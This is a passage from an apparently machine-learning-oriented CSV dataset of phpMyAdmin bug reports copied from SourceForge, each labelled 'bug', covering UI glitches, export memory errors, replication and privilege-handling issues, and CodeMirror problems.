This is happening in both Firefox 22 and IE 9.
Anyone else having this problem?
Hi, how many rows?
I m trying in 4.0.4.2 with a small table and get a confirmation panel whole main panel) with all the DELETE statements.
The table I was working with was a development table, it was 10 or less rows.
I was just clearing them out to see the newly submitted data from our app.
Ok, I was not trying to confirm the deletions.
I see the Loading message staying there but I was able to delete.
Original URL https sourceforge.net p phpmyadmin bugs 4042 Original author lem9 Found in version 4.0.7","bug"
"24444","10428","User group privs editor Check all box not preselected.
When loading the user group privileges editor, the Check all box is not preselected.
Steps to reproduce 1.
Add a user group with partial or full view rights.
2.
In the user groups table, for the group, click the Edit link.
Expected result The Check all checkbox is partially or completely checked, depending on the rights.
Actual result The Check all checkbox is always unchecked.
Original URL https sourceforge.net p phpmyadmin bugs 4043 Original author mynetx Found in version Latest Git","bug"
"24444","10429","https Class declarations may not be nested in libraries Table.class.php.
When I call phpmyadmin via https, I get the error PHP Fatal error Class declarations may not be nested in usr share phpmyadmin libraries Table.class.php on line 14 when I use the same installation without https, it all wirks fine.
I use PHP 5.3.3 7 squeeze16 PMA 3.3.7deb7 MySQL client version 5.1.66 my apache config NameVirtualHost 443 <VirtualHost 443> ServerAdmin root myserver.de DocumentRoot var kunden webs debian secure ServerName myserver.de Alias databaseadmin usr share phpmyadmin ErrorLog var log apache2 secure error.log CustomLog var log apache2 secure access.log combined SSLEngine On SSLCertificateFile etc ssl certs wildcard myserver.crt SSLCertificateKeyFile etc ssl private wildcard myserver.key < VirtualHost> Original URL https sourceforge.net p phpmyadmin bugs 4044 Original author rubo77 Found in version 3.3.7","bug"
"24444","10430","Exporting huge Tables causes memory Problems.
We got a Problem with the 4.0.4.1 Version and exporting of huge Tables oder Databases.
Since we upgraded to Major Release 4 exporting of huge Tables wont work and causes errors like Out of memory allocated 1270349824) tried to allocate 629166081 bytes) in libraries Response.class.php or Allowed memory size of 1073741824 bytes exhausted tried to allocate 697377364 bytes) in libraries OutputBuffering.class.php on line 114 A raw Dump of this Table is about 578MB very close to that 62916.. bytes), and we already tried to set memory limit to maximum value but it didnt help.
I suspect Output Buffering to be a Problem, the Content of the Output Buffer is copied on some Parts, for example in OutputBuffering.class.php buffer > content = ob get contents ); ob end clean ); At the moment when ob get contents is called the buffer content is hold twice times and causing memory Problems.
According to my Customer, exporting this huge Table was no Problem in phpMyAdmin 3.
Thanks for help!
Original URL https sourceforge.net p phpmyadmin bugs 4046 Original author benrik Found in version 4.0.4","bug"
"24444","10431","CodeMirror off breaks the script.
So, recently there have been some changes made with using CodeMirror for syntax highlighting in the GUI.
for example pull request 399 on git).
Situation before I think) CodeMirror is used for edit query Syntax highlighting for the query shown when you for example browse a table is done with PHP not sure, but I guess so).
Situation after CodeMirror is used for both.
Now the problem is that I have codemirror disabled since I don t like it in my edit box.
Before the queries that are executed would be nicely highlighted, now I get a javascript error fixed this in pull request 570).
However what I d ideally see is that when CodeMirror is disabled in the options, my executed queries still get highlighted like they used to.
With my fix I get the query just in plain text, not nicely formatted like before.
Original URL https sourceforge.net p phpmyadmin bugs 4047 Original author gtoniser Found in version Latest Git","bug"
"24444","10432","Cannot select foreign value in Search.
When searching and clicking on Browse foreign values , we get an error when picking a foreign value.
Original URL https sourceforge.net p phpmyadmin bugs 4048 Original author lem9 Found in version 4.0.5","bug"
"24444","10433","Config.header and Config.footer content disappears.
config.header.inc.php and config.footer.inc.php are broken for both included themes.
To reproduce Put any legal text, HTML or PHP into the file.
Problem 1 First page render after login correct.
Any subsequent page render except switching to another theme is wrong.
Header and or Footer text disappears.
This appears to be related to how how the AJAX does frame replacement as the HTML is still present in the source after the desired content disappears.
No combination of HTML and or JavaScript trickery has enabled the content of the either the config.header or the config.footer files to remain visible.
Problem 2 Header included twice on login page.
Minor glitch.
Included only for completeness) Original URL https sourceforge.net p phpmyadmin bugs 4050 Original author amagrude Found in version 4.0.5","bug"
"24444","10434","Wrong tabindex when inserting rows.
Go to insert some rows in a table.
Tab indexes are as expected for a 4 field table it s 1,2,3,4 for the first row then 5,6,7,8 for the second) Add more fields using Continue insertion at the bottom.
The tab indexes for the new fields are wrong.
The 3rd row goes 7,8,9,8 and the 4th goes 10,11,12,8.
Original URL https sourceforge.net p phpmyadmin bugs 4051 Original author svivian Found in version 4.0.5","bug"
"24444","10435","Revoking non existent Grant Option breaks MySQL 5.6 Replication.
This applies to MySQL 5.6. phpMyAdmin removes the grant option by default if you modify user rights even if there is no grant option defined for that user, so Replication always breaks if you use phpMyAdmin to modify user rights for a certain table on which the user has no grant option.
Replication also breaks if you revoke the grant option from a database or table if the grant is not defined.
mysql> REVOKE GRANT OPTION ON `testdb`.`test table` FROM testuser 127.0.0.1 ; ERROR 1141 42000) There is no such grant defined for user testuser on host 127.0.0.1 Leads to a Incident LOST EVENTS Entry in binary log and makes the slaves stop.
Applies to all phpMyAdmin Versions i suppose.
Tested in 3.3.10.2 and 4.0.5.
According MySQL Bug http bugs.mysql.com bug.php?id=68892 phpMyAdmin should only execute revoke grant option if the user has a grant option on that table.
Original URL https sourceforge.net p phpmyadmin bugs 4052 Original author moritzschuepp Found in version 4.0.5","bug"
"24444","10436","Contest 1 List of procedures is not displayed after executing with Enter.
When executing a procedure, the list of procedures is not displayed when the popup is closed with Enter, if it is closed with Go , it works as expected.
Original URL https sourceforge.net p phpmyadmin bugs 4053 Original author ruleant Found in version 4.1.7","bug"
"24444","10437","query analysis doesn t launch in status monitor.
when selecting Query analyser in Status monitor, it doesn t load.
In Status > Monitor, you can select a portion of the graph and a panel shows a time range.
Then you can display the corresponding queries, and these are clickable.
You should be able to obtain an analysis of this query but nothing happens.
Original URL https sourceforge.net p phpmyadmin bugs 4054 Original author ruleant Found in version 4.0.5","bug"
"24444","10438","Back action broken on some pages.. Back action broken on some pages.
Steps 1. open http demo.phpmyadmin.net master config 2. open `class` database 3. open `Item` table 4. open SQL tab 5. write any query ex.
SELECT FROM `Item` WHERE `Item Number` > 5); 6. press Go button; 7. press Back button of browser or Backspace key.
Expected page with textarea with our executed query as in phpMyAdmin < 4.0).
Actual default page of `Item` table.
When using mouse gestures, this type of work is much faster, than always aim required link... thank you.
Original URL https sourceforge.net p phpmyadmin bugs 4314 Original author sailormax Found in version Latest Git snapshot","bug"
"24444","10439","Insert more than one row doesn t uncheck Ignore .
When inserting more than one new row to a database, the Ignore checkbox defaults to checked, but by some JavaScript is supposed to be automatically un checked as soon as we type in any of the columns.
Except it doesn t happen for the last column when trying to insert a second row, or for the last two columns when inserting the third row.
Original URL https sourceforge.net p phpmyadmin bugs 4055 Original author ibennetch Found in version Latest Git","bug"
"24444","10440","Language Vague error message when adding a varchar field.
When adding a varchar column and neglecting to enter a length, the error message This is not a number!
strNotNumber) is vague and doesn t help the user find the problem.
If we rephrase it as You have not entered a valid length of this data type , would that be appropriate for 1) the other data types CHAR, BIT, VARBINARY, and BINARY) and 2) the other usage of strNotNumber in function checkFormElementInRange theForm, theFieldName, message, min, max)?
If 1=yes and 2=no, perhaps we must create a new string?
Original URL https sourceforge.net p phpmyadmin bugs 4056 Original author ibennetch Found in version 4.0.5","bug"
"24444","10441","db table query string parameters no longer work.
Since version 4, this kind of URL no longer works `example.com phpmyadmin ?db=mydatabase table=mytable` It used to go to the database and or table, now it just stays on the home page .
It was really useful to have that link as a bookmark or to see it autocomplete in the browser so you could click it, log in, and go straight to a specific database.
I understand that the new AJAXy system doesn t use the query string any more, but the hash fragment doesn t seem to work either.
Oddly, if I try to add db=mydatabase to the hash something like `index.php PMAURL 0 index.php?db=mydatabase` it redirects to `index.php?db=mydatabase variousjunk` but it still shows the home page, not the database!
Hopefully this can get fixed...
Original URL https sourceforge.net p phpmyadmin bugs 4057 Original author svivian Found in version 4.2.12","bug"
"24444","10442","Query inline link disappears when running UPDATE query.
Go to a table, run a simple UPDATE query.
The grey box showing the query only has the Edit link which opens the popup window with the advanced query editor.
Furthermore, when you edit the query in the popup window and click Go , instead of executing the query in the original tab, it opens a new tab.
The grey box showing the new query does have the Inline and Edit links as it should.
But if you use the inline query editor again and do an update, it goes back to only having Edit again...
Original URL https sourceforge.net p phpmyadmin bugs 4058 Original author svivian Found in version 4.0.5","bug"
"24444","10443","Browser tries to remember wrong password when creating new user.
When creating a new user, the browser at least Dieter s and mine) offers to save the password, but thinks the username is what is actually the host field.
We probably should just tell the browser not to save a password here.
Original URL https sourceforge.net p phpmyadmin bugs 4060 Original author ibennetch Found in version 4.0.7","bug"
"24444","10444","MariaDB at 100 CPU with OQGRAPH.
Using MariaDB 10.0.8 Everytime I browse to a OQGRAPH table, MariaDB goes to 100 CPU usage and the webpage is stuck with a Loading message.
This only happens in PHPMyAdmin as far as I can tell.
If I log into the MariaDB server from cli, I can use the table normally Original URL https sourceforge.net p phpmyadmin bugs 4320 Original author blitzmann Found in version 4.1.9","bug"
"24444","10445","No error message when calling an insert stored procedure with too few parameters.
There is no error message when calling an insert stored procedure with too few parameters.
This is one of the errors discovered at DebConf.
Original URL https sourceforge.net p phpmyadmin bugs 4061 Original author ibennetch Found in version Latest Git","bug"
"24444","10446","Setting BLOB to null gives incorrect number of affected rows.
If you update a row with a BLOB column and set it to NULL, the operation works but says 0 rows affected, which obviously is an incorrect row count.
This is another one of my notes from DebConf Original URL https sourceforge.net p phpmyadmin bugs 4062 Original author ibennetch Found in version Latest Git","bug"
"24444","10447","gis data editor page js error.
I add column with MutiPoint type, but When i want to edit this value, it cause a problem.
Original URL https sourceforge.net p phpmyadmin bugs 4322 Original author lang1pal Found in version 4.1.9 Attachment http sourceforge.net p phpmyadmin bugs 4322 attachment shot.PNG Attachment http sourceforge.net p phpmyadmin bugs 4322 attachment shot1.PNG","bug"
"24444","10448","Status monitor links don t work.
Quoting Marc s clarification of my notes In Status > Monitor, you can select a portion of the graph and a panel shows a time range.
Then you can display the corresponding queries, and these are clickable.
You should be able to obtain an analysis of this query but nothing happens.
Original URL https sourceforge.net p phpmyadmin bugs 4063 Original author ibennetch Found in version Latest Git","bug"
"24444","10449","QueryWindow ignores CodeMirror.
In order to reproduce the bug 1) enable CodeMirror in Settings > SQL queries > Enable CodeMirror 2) try to execute any query in QueryWindow you will receive alert Missing value in the form ) After doing some minor research, I have detected that QueryWindow ignores Enable CodeMirror setting and tries to read sql query value from textarea which is always empty at that time) insteadof CodeMirror editor.
p.s.
Everything works fine after Enable CodeMirror is disabled.
Original URL https sourceforge.net p phpmyadmin bugs 4323 Original author crylar Found in version 4.1.9","bug"
"24444","10450","Datepicker not showing up on insert page.
1.
On table browse page, use the datepicker to grid edit for some date, datetime field.
2.
Click on insert page, try clicking on the datepicker icon beside the input field for datetime type, the datepicker doesn t show up.
Using grid edit first is the precondition.
Present in QA 4 1 as well as master.
Original URL https sourceforge.net p phpmyadmin bugs 4324 Original author atul5 Found in version 4.1.9","bug"
"24444","10451","Table structure statistics Space usage caption too small for l10n.
Hey guys, I m in your demo phpMyAdmin and have found a bug.
The table head is to small for the text.
I ve a attached a screenshot.
I use IE10 on Windows 8.
Thanks in advance!
Original URL https sourceforge.net p phpmyadmin bugs 4064 Original author dennis1993 Found in version 4.0.5 Attachment http sourceforge.net p phpmyadmin bugs 4064 attachment Unbenannt 1.png","bug"
"24444","10452","Can t edit text field, because error dialog is above it.
Hey guys, I have found a bug.
1.
I create two tables and make a constaint with the ID.
Code for this CREATE TABLE IF NOT EXISTS `categories` `catID` int 11) NOT NULL AUTO INCREMENT, `name` varchar 25) NOT NULL, PRIMARY KEY `catID`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; INSERT INTO `categories` `catID`, `name`) VALUES 1, Category 1 ), 2, Category 2 ); CREATE TABLE IF NOT EXISTS `items` `itemID` int 11) NOT NULL AUTO INCREMENT, `catID` int 11) NOT NULL, `name` varchar 25) NOT NULL, PRIMARY KEY `itemID`), KEY `catID` `catID`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; INSERT INTO `items` `itemID`, `catID`, `name`) VALUES 1, 1, Item 1 ), 2, 1, Item 2 ); ALTER TABLE `items` ADD CONSTRAINT `items ibfk 1` FOREIGN KEY `catID`) REFERENCES `categories` `catID`) ON DELETE CASCADE ON UPDATE CASCADE; 2.
I edit an entry.
I click on the cell an now I can edit it directly Screenshot 1) I wrote the number 3 in it, buw 1 and 2 are possible reference to table 1) 3.
If I save it now, I can see two bugs 3.1 The query is to long and the dialog to small 3.2 The dialog is above the text field and I can t edit the wrong value.
Screenshot 2) The only way Close the browser and start from beginning.
Maybe you can make the dialog above the table or so.
I hope you understand what I mean.
THANKS in advance!
Original URL https sourceforge.net p phpmyadmin bugs 4065 Original author dennis1993 Found in version 4.0.5 Attachment http sourceforge.net p phpmyadmin bugs 4065 attachment screenshot2.png Attachment http sourceforge.net p phpmyadmin bugs 4065 attachment screenshot1.png","bug"
"24444","10453","varchar field not truncated in table browse mode.
Example table CREATE TABLE IF NOT EXISTS `pmabug1` `id` int 11) NOT NULL AUTO INCREMENT, `something` varchar 1000) NOT NULL, `another` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; Fill in a row or two with some long values e.g.
Lorem Ipsum).
Go to Browse mode.
The TEXT field is truncated as expected, but the VARCHAR is not.
The options like the < T > on the table are not active, and the limit column characters option is the default 50.
Original URL https sourceforge.net p phpmyadmin bugs 4066 Original author svivian Found in version 4.0.5","bug"
"24444","10454","Import Resume at breakpoint failure.
Issue Importing large files .
With the Allow the interruption of an import in case the script detects it is close to the PHP timeout limit.
ticked.
The PHP timeout is reached at varying points when importing an .sql.zip file.
The zipped file is 4.6MB.
The raw sql file is 32.7MB.
Up to this latest version 4.0.5 of PhpMyAdmin the import would usually break and when reloaded would resume the import at the break point.
Now, reloading the file, causes PhpMyAdmin to attempt to reimport the file from the beginning giving a fatal error that Table Admin already exists .
The only solution I have found is to start the import, wait until the timeout occurs, uncompress the upload file on my machine, delete the contents of the raw sql file that have managed to upload, recompress the remaining file and upload again.
This sometimes requires that this process is repeated before the whole 32.7MB is uploaded with all the attendant risks of errors being made at each point.
Can you please fix the import mechanism so that the import does indeed resume at the broken point.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4067 Original author chrisstreat Found in version 4.0.5","bug"
"24444","10455","Headline in operations not readable in IE10.
I have used your demo phpMyAdmin and saw with Internet Explorer 10 the following bug, The headline is not readable.
Original URL https sourceforge.net p phpmyadmin bugs 4068 Original author dennis1993 Found in version 4.0.5 Attachment http sourceforge.net p phpmyadmin bugs 4068 attachment ie10 headstosmall.png","bug"
"24444","10456","Navigation tree height not set correctly dynamically.
As seen in RELEASE 4 0 5RC1 132 gc2e5b11 Related to [RFE 1435] https sourceforge.net p phpmyadmin feature requests 1435 ).
Expanding a database in the navigation tree does not use the available content height.
See photo attachment.
> 73c3cd906e484c75f19039bd4086daa3fd62b8fa is the first bad commit > commit 73c3cd906e484c75f19039bd4086daa3fd62b8fa > Author Atul Pratap Singh <atulpratapsingh05 gmail.com> > Date Sun Aug 25 22 55 43 2013 0530 > > Fast filter box, recent tables and page selector should be visible while scrolling navigation, it eliminates the need to scroll up to find datatbase recent table) > > 040000 040000 b0932962b384b4f6ca38a479500ac14217897c37 4a1be0339d747e768255370ec8e9551f1208c3cc M js > 040000 040000 7cc4b0f1bc9dabcf74a01867fbed1fc15c210a38 5bdb858733a846ed13ff53764a54e6be5657ba1d M libraries > 040000 040000 b8a96db5ff3d6fdd226ef224a0a89839fddefea5 43a2413552dcace7456faea3635e4636a25c7c47 M themes Apparently it was forgotten to set the height of ` pma navigation tree` dynamically, opposed to what is commented in the CSS.
Navigation tree pma navigation tree { margin 5px 0 0; margin <?php echo left; ?> 10px; color 444; height 74 ; it needs to be dynamically set position relative; } Original URL https sourceforge.net p phpmyadmin bugs 4069 Original author mynetx Found in version Latest Git snapshot Attachment http sourceforge.net p phpmyadmin bugs 4069 attachment pma navigation tree height.jpg","bug"
"24444","10457","Confusing database table grouping.
Database groupping can be confusing if the last node in navigation frame is grouped there is group, but when you unfold it, some databases are not there as they did not fit into the whole page limit.
I think in this case the limit should be simply ignored as having not complete group is quite confusing.
Original URL https sourceforge.net p phpmyadmin bugs 4070 Original author nijel Found in version 4.0.5","bug"
"24444","10458","Designer main program stops working after moving the column in a table.
After changing the order of the columns in a table, I go to the designer tab and notice that most of the lines which indicated the relationship between two tables are missing.
When trying to move a table, it couldn t be released at the dropped location and moving around with the mouse.
Click on the structure tab or any other tab won t help and it seems that the main program is also dead)locked.
Original URL https sourceforge.net p phpmyadmin bugs 4071 Original author alesan2013 Found in version 4.0.5","bug"
"24444","10459","Copy table no longer copies indexes.
Since this commit https github.com phpmyadmin phpmyadmin commit 8cf74b688d882a9545a651498664de912c7fb659 going to table > Operations and copying a table with structure, no longer copies its indexes.
Original URL https sourceforge.net p phpmyadmin bugs 4332 Original author lem9 Found in version Latest Git","bug"
"24444","10460","Export doesn t work on my server.
This is a strange one.
PMA has been working fine on localhost and one of my servers.
But on another, I just upgraded PMA from scratch I deleted version 3 and added latest 4.0.5).
Most things work OK but when I click the Export button, either on a database or table, it just hangs.
The yellow Loading box appears but nothing happens.
I check in Dev Tools and there is an AJAX request for ` db export.php?db=phpmyadmin token=5bacb1c66edff5ff7775087231f90e46 ajax request=true ajax page request=true menuHashes=977d3860 dae0601e 7cdab78f 014d4bca nocache=1377602979563596588` The Response tab is just blank.
This server is running PHP 5.2.6 2ubuntu4 and MySQL Ver 14.12 Distrib 5.0.67 whereas the others are 5.3.
Let me know if I can provide any more information.
Original URL https sourceforge.net p phpmyadmin bugs 4072 Original author svivian Found in version 4.0.5","bug"
"24444","10461","javascript error when i click structure tab.
Uncaught TypeError Cannot read property success of null javascript error!
!when i click on structure tab i am using win 8 Original URL https sourceforge.net p phpmyadmin bugs 4073 Original author sea129 Found in version 4.0.5","bug"
"24444","10462","GIS column editor point not displayed.
When clicking on Edit Insert, the pane opens but the point is not displayed on the map.
I am testing on Debian 7 with Firefox Iceweasel) with the capitals table.
When trying with 3.5.0 or QA 3 5, it s better I see the point), however dragging the point does not change the X Y coordinates nor the Output area ticking Use OpenStreetMaps does not display a map but the coordinates change on the right side) In 3.5.0, should I be expecting the X Y coordinates left side) and the Output area to change?
I also tried Copy; it closes the panel but does not copy the new coordinates.
Original URL https sourceforge.net p phpmyadmin bugs 4074 Original author lem9 Found in version 4.0.7","bug"
"24444","10463","Support A10 Networks load balancer.
Enabling ForceSSL results in redirect loop.
Tested with Chrome and Firefox Mac) cfg[ ForceSSL ] = TRUE; Original URL https sourceforge.net p phpmyadmin bugs 4075 Original author robspekschoor Found in version 4.0.9 Attachment http sourceforge.net p phpmyadmin bugs 4075 attachment Screen 20Shot 202013 08 28 20at 2011.53.43.png","bug"
"24444","10464","Phpmyadmin doesn t work if session.save handler set to memcache.
phpmyadmin doesn t work if session.save handler set to memcache for example session.save handler = memcache session.save path = tcp localhost 11211 I tried the latest version available from http www.phpmyadmin.net home page downloads.php Original URL https sourceforge.net p phpmyadmin bugs 4076 Original author teslasimus Found in version 4.0.5","bug"
"24444","10465","Memory allocation error in phpmyadmin 4.0.5.
[Mon Sep 02 11 58 05 2013] [error] [client 95.132.57.53] PHP Fatal error Allow ed memory size of 134217728 bytes exhausted tried to allocate 13205096 bytes) i n Unknown on line 0, referer http 93.153.131.113 myadmin db structure.php?pos =250 db=jm book us token=b155ce735eb894cd3e1a29e2cc9dsfe3 [Mon Sep 02 11 58 09 2013] [error] [client 95.132.57.53] PHP Fatal error Allow ed memory size of 134217728 bytes exhausted tried to allocate 13680110 bytes) i n Unknown on line 0, referer http 93.153.131.113 myadmin navigation.php?db=jm book us token=b155ce735eb894cd3e1a29e2cc9dsfe3 [Mon Sep 02 11 58 10 2013] [error] [client 95.132.57.53] PHP Fatal error Allow ed memory size of 134217728 bytes exhausted tried to allocate 13672879 bytes) i n var www phpmyadmin navigation.php on line 55, referer http 93.153.131.113 myadmin sql.php?db=jm book us token=b155ce735eb894cd3e1a29e2cc9dsfe3 goto=db str ucture.php table=heusers pos=0 Original URL https sourceforge.net p phpmyadmin bugs 4078 Original author winrem Found in version 4.0.5","bug"
"24444","10466","Overwrite existing file not obeyed.
With custom export, the Overwrite existing file s) checkbox has no effect.
Original URL https sourceforge.net p phpmyadmin bugs 4080 Original author lem9 Found in version 4.0.6","bug"
"24444","10467","Contest 2 Setup page content shifted to the right edge of its tabs.
The content of setup pages is displayed to the right of the right edge of its tabs see attached image) in the following web browsers Pale Moon 20.3 Firefox 23.0 Opera 12.16 MSIE 9 in Compatibility view It is only displayed as intended in MSIE 9 in native view.
Original URL https sourceforge.net p phpmyadmin bugs 4081 Original author ligh1l Found in version 4.0.6 Attachment http sourceforge.net p phpmyadmin bugs 4081 attachment pma setup shifted.png","bug"
"24444","10468","Copy user no longer keeps permissions properly.
Under a user the option to Change Login Copy User has several flaws.
For one, it seems there is no actual way to just change login information, you have to destroy a user, create a new one.
That flaw then falls prey to the bug, which is Create new user with same privileges is no longer true.
In the past this worked, but in 4.0.5 the new user has NO privileges to anything, where it s expected and used to be that database specific rights were replicated as expected in the new user.
This means these all have to be set after the user is cloned, and in the case of just trying to change a password, you now have to go reset everything for the new user that has replaced the old one but has no rights.
Original URL https sourceforge.net p phpmyadmin bugs 4082 Original author ebonweaver Found in version 4.0.5","bug"
"24444","10469","row deleting isn t binlogs friendly.
I ve activated binlogs in my mysql server binlog format = STATEMENT).
I delete a row from phpmyadmin mark it, click on delete icon); this SQL is launched DELETE FROM `zabbix`.`trends uint` WHERE `trends uint`.`itemid` = 20389 AND `trends uint`.`clock` = 1378292400 LIMIT 1; This appears in the server log [Warning] Unsafe statement written to the binary log using statement format since BINLOG FORMAT = STATEMENT.
The statement is unsafe because it uses a LIMIT clause.
This is unsafe because the set of rows included cannot be predicted.
Statement DELETE FROM `zabbix`.`trends uint` WHERE `trends uint`.`itemid` = 20389 AND `trends uint`.`clock` = 1378292400 LIMIT 1 The suggested workaround is include a SORT BY on a unique and non nullable column so the row deleted is the same on all slaves.
Original URL https sourceforge.net p phpmyadmin bugs 4083 Original author bertitus Found in version 4.0.6","bug"
"24444","10470","Create table dialog closes after pressing ESCAPE key.
When you create new table using Create table dialog window at the end of page with list of tables), pressing ESCAPE key closes the dialog.
This is super annoying, because ESC key is usually used to reject auto complete in text inputs and so on.
Please change the behaviour, so that I don t lose all my designed table structure every time I accidentally press ESC key.
If only you could also take back all that creases from my forehead, that I got when I closed semi finished dialog with 15 columns for the third time.)
Original URL https sourceforge.net p phpmyadmin bugs 4084 Original author sustmi Found in version 3.5.8","bug"
"24444","10471","SQL Error not shown.
If you enter any SQL that would throw an error, that error is not displayed as it would be formerly), but only the message > MySQL returned an empty result set i.e.
zero rows).
Query took 0.0000 sec) appears Tested on http demo.phpmyadmin.net master Try e.g.
> slect foo in any DB Original URL https sourceforge.net p phpmyadmin bugs 4085 Original author rm km it Found in version Latest Git","bug"
"24444","10472","Undefined index query.
Notice in .
libraries DisplayResults.class.php 4210 Undefined index query Backtrace .
libraries sql.lib.php 2265 PMA DisplayResults >setConfigParamsForDisplayTable ) .
sql.php 190 PMA executeQueryAndSendQueryResponse array, boolean true, string sakila , string staff list , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `staff list` , NULL, NULL, ) Happens on first browsing in phpMyAdmin you need clear session to reproduce this).
Original URL https sourceforge.net p phpmyadmin bugs 4087 Original author nijel Found in version Latest Git","bug"
"24444","10473","MySQL server version at index.php incorrect w controlhost.
When using a controlhost which isn t the same as the server you re connecting to, the mysql version on the index is the version of the controlhost and not the version of the database you re connecting to.
Example Controlhost = localhost = 5.5.32 0ubuntu0.12.04.1 log Server i m connecting to = remote host = 5.6.13 rc60.5 Percona Server Index.php displays 5.5.32 0ubuntu0.12.04.1 log instead of 5.6.13 rc60.5 Percona Server Original URL https sourceforge.net p phpmyadmin bugs 4088 Original author keeshoekzema Found in version 4.0.6","bug"
"24444","10474","Downloading BLOB downloads page template.
Hello.
Im using PMA 4.0.4.1.
After creating table with MEDIUMBLOB column and filling in some data, clicking on `download size of column) results in opening download window.
The downloaded file contains phpmyadmin template output html of pma screen) on the beggining and then contents of blob column.
After putting .jpg to db its impossible to view it without saving and editing file cutting html).
Thanks in advance for fixing it.
Original URL https sourceforge.net p phpmyadmin bugs 4090 Original author peku33 Found in version 4.0.6","bug"
"24444","10475","Insert ignore option does not work.
Hello again.
On insert page there is a select window allowing to choose between Insert as new row , Insert as new row and ignore errors , show query not sure of translation).
Regardless of what is set the phpmyadmin always behaves like the first option is set.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 4091 Original author peku33 Found in version 4.0.6","bug"
"24444","10476","Clicking on table name in view of information schema redirects to wrong page.
It s me again.
While creating custom query in information schema probably the same with search) table and column names are showed as links.
Those links navigates to main page, but in navigation bar there still is correct name of database and table.
After clicking on structure or browse works fine.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 4092 Original author peku33 Found in version 4.0.4","bug"
"24444","10477","Chrome on Mac crashes when using nav tree.
When using Chrome on a Mac I am able to expand navigation items in the tree, but as soon as you try to collapse anything on the tree the page crashes with the Chrome Aw Snap!
Something went wrong while trying to display the webpage.
I also see the same issue when viewing the demo sites on SourceForge for versions 4.0.6 and 4.1.0.
I also verified that this happens on both the original theme and the pmahomme theme.
This issue does not happen in Safari or in chrome running under windows on the same computer.
I m also not getting any errors or warnings in the chrome console or any chrome crash reports, so I haven t been able to determine which part of the code is causing the crash.
Software Versions Chrome for Mac 29.0.1547.65 PHPMyAdmin My Server) 4.0.5 PHPMyadmin Demo Site) 4.0.6, 4.1.0 MySQL My Server) 5.5.31 55 log Percona XtraDB Cluster MySQL Demo Site) 5.5.31 1 Debian) Web Server My Server) Nginx 1.1.19, libmysql 5.5.32, mysqli Web Server Demo Site) lighttpd 1.4.31, libmysql 5.5.31, mysqli and mysql Original URL https sourceforge.net p phpmyadmin bugs 4093 Original author joe010 Found in version 4.0.5","bug"
"24444","10478","Wrong database expanded when clicking in the new nav pane.
We have a backup database for each live pre pended with Alpha.
i.e.
AlphaConfigGenerator AlphaProjects ConfigGenerator Projects When I click on Projects it expands AlphaProjects and when I click on ConfigGenerator it expands AlphaConfigGenerator etc.
Clicking on the icon works as expected it s only the text link that doesn t work.
Original URL https sourceforge.net p phpmyadmin bugs 4094 Original author guyjhopkins Found in version 4.0.6","bug"
"24444","10479","NUL symbols added to the end of database dump file.
Hello, I m trying to export database and import into localhost.
I select 1 table, no compression, save output to file.
The same problem with 4.0.7 rc1.
Works perfect in 3.5.8.2.
Importing to localhost fails with BEGIN CUT eNo1zDsKwzAURNGAu7eKWYAQlj BqBNG2IanTyQlhvQp0rjP7iMbMuVwuDalkDQmhakDW6 h0EEp yqXeDZH75jtrjHKUfU PnBCygJmtLwJPW9H22eHCa2U2lbUUndEYZCuvFJd4GBHyURikumFbvS E xs8a753OODWX 35USB8h END CUT BEGIN RAW ERROR C1 C2 LEN 1 2 11 STR x03 MySQL 5.5.33 USR OS, AGENT, VER Win MOZILLA 5.0 PMA 4.0.6 PHP VER,OS 5.4.19 WINNT LANG en SQL x03 END RAW In the end of dump are these symbols check attachment.
After editing them out, import is successfull.
What could cause this?
Nothing fancy with server.
Simple Mac OS X 10.5.8 Server running php 5.2.15, apache 2.2.17, mysql 5.0.92.
No .htaccess files that affects PMA installation.
Please, advice.
Thank you.
x03x03 Original URL https sourceforge.net p phpmyadmin bugs 4095 Original author kaalis Found in version 4.0.7 Attachment http sourceforge.net p phpmyadmin bugs 4095 attachment dump.png","bug"
"24444","10480","Default table tab is ignored.
Changing the value in Setting, Main Panel, Tabs, Default table tab is ignored.
The settings is saved but sql.php is still used.
note it s working for Default database tab Original URL https sourceforge.net p phpmyadmin bugs 4098 Original author mathroc Found in version 4.0.6","bug"
"24444","10481","Server library difference warningDocumentation setting is ignored.
In settings, I ve checked Server library difference warning but after login logout the warning is still shown but checked in settings) Original URL https sourceforge.net p phpmyadmin bugs 4099 Original author mathroc Found in version 4.0.7","bug"
"24444","10482","table tree group strategy.
when grouping tables by name if a table have a name which is a prefix of another, this table is not inside the group, eg with 3 tables products, products description, products stock.
I have this tree [database] [table] products [group] products [table] products description [table] products stock instead wouldn t it be preferable to have, either [database] [group table] products [table] products description [table] products stock or [database] [group] products [table] products [table] products description [table] products stock both would decrease the number of lines when the tree is folded Original URL https sourceforge.net p phpmyadmin bugs 4100 Original author mathroc Found in version 4.0.6","bug"
"24444","10483","ALTER TABLE ORDER BY and InnoDB.
This option under Operations should not be displayed for an InnoDB table that has a primary or unique key.
See http stackoverflow.com questions 18973050 reorder a column with phpmyadmin using innodb storage engine does not work Original URL https sourceforge.net p phpmyadmin bugs 4102 Original author lem9 Found in version 4.0.7","bug"
"24444","10484","Tracking report cannot delete a statement.
In Tracking report, the Delete link for statements does not work Original URL https sourceforge.net p phpmyadmin bugs 4103 Original author lem9 Found in version 4.0.7","bug"
"24444","10485","Can t edit updatable view when searching.
If you have an updatable view like >CREATE VIEW bar AS SELECT FROM foo you can edit rows in simple Browse mode, but when you have a WHERE clause like >SELECT FROM `bar` WHERE `ID` = 1 phpMyAdmin says Current selection does not contain a unique column.
Grid edit, checkbox, Edit, Copy and Delete features are not available.
Original URL https sourceforge.net p phpmyadmin bugs 4104 Original author rm km it Found in version 4.0.8","bug"
"24444","10486","More disappears in table Structure.
To reproduce open Structure for a table reduce window s width so that some column actions are under More click on Change for one column change something and save More is no longer there Original URL https sourceforge.net p phpmyadmin bugs 4105 Original author lem9 Found in version 4.0.7","bug"
"24444","10487","Precision specifier for DOUBLE type is truncated.
